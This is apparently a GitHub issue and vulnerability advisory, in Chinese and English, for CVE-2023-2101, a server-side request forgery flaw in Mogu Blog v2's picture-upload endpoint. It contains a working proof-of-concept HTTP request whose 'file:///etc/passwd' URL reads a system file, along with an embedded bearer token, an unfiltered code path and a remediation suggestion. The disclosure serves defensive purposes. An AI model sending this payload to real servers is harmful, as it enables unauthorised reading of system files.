Headline
CVE-2023-2101: mogu_blog_v2-FileRestApi#uploadPicsByUrl-存在SSRF漏洞(mogu_blog_v2-FileRestApi#uploadPicsByUrl has a SSRF vulnerability) · Issue #97 · moxi624/mogu_blog_v2
A vulnerability, which was classified as problematic, has been found in moxi624 Mogu Blog v2 up to 5.2. This issue affects the function uploadPictureByUrl of the file /mogu-picture/file/uploadPicsByUrl. The manipulation of the argument urlList leads to absolute path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226109 was assigned to this vulnerability.
构造BurpSuite请求报文,利用file协议读取文件/etc/passwd中的内容,写入到图片中:
Construct a BurpSuite request message, use the file protocol to read the contents of the /etc/passwd file, and write it into an image:
POST /mogu-picture/file/uploadPicsByUrl HTTP/1.1
Host: you-ip:8602
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: bearer_eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pblVpZCI6IjFmMDFjZDFkMmY0NzQ3NDNiMjQxZDc0MDA4YjEyMzMzIiwicm9sZSI6Im51bGzotoXnuqfnrqHnkIYiLCJjcmVhdGVUaW1lIjoxNjgwMTU2NjY4NTExLCJzdWIiOiJhZG1pbiIsImlzcyI6Im1vZ3VibG9nIiwiYXVkIjoiMDk4ZjZiY2Q0NjIxZDM3M2NhZGU0ZTgzMjYyN2I0ZjYiLCJleHAiOjE2ODAxNjAyNjgsIm5iZiI6MTY4MDE1NjY2OH0.oXuQcn6Do52V7XkiPiH1Ug1XKOHNgKk4BTeksFgj8DI
Connection: close
Content-Type: application/json
Content-Length: 122
{
"token":"asdf",
"adminUid":"asdf",
"sortName":"admin",
"projectName":"blog",
"urlList":[
"file:///etc/passwd"]
}
进入uploadPictureByUrl()方法:
传入的fileV0为springboot前端传入的参数自动装配,从fileV0中取出urlList
Enter the uploadPictureByUrl() method:
The incoming fileV0 is the parameter automatically wired by the Spring Boot frontend. Extract urlList from fileV0
遍历urlList并传入uploadPictureByUrl()方法中,中间未作任何过滤:
Traverse urlList and pass it into the uploadPictureByUrl() method without any filtering in between:
更进uploadPictureByUrl方法:
uploadPictureByUrl方法中也未作任何过滤,直接传入URL类中
Further improve the uploadPictureByUrl method:
no filtering is done in the uploadPictureByUrl method, and the URL is directly passed in
调用openConnection方法后,获取数据流写入输出流中:
After calling the openConnection method, get the data stream and write it to the output stream:
(1)建议使用HttpURLConnection类,替代Url类,并对请求的ip地址进行判断,过滤掉内网ip
(1)Suggest using the HttpURLConnection class instead of the Url class, and filtering out intranet IP addresses by checking the requested IP address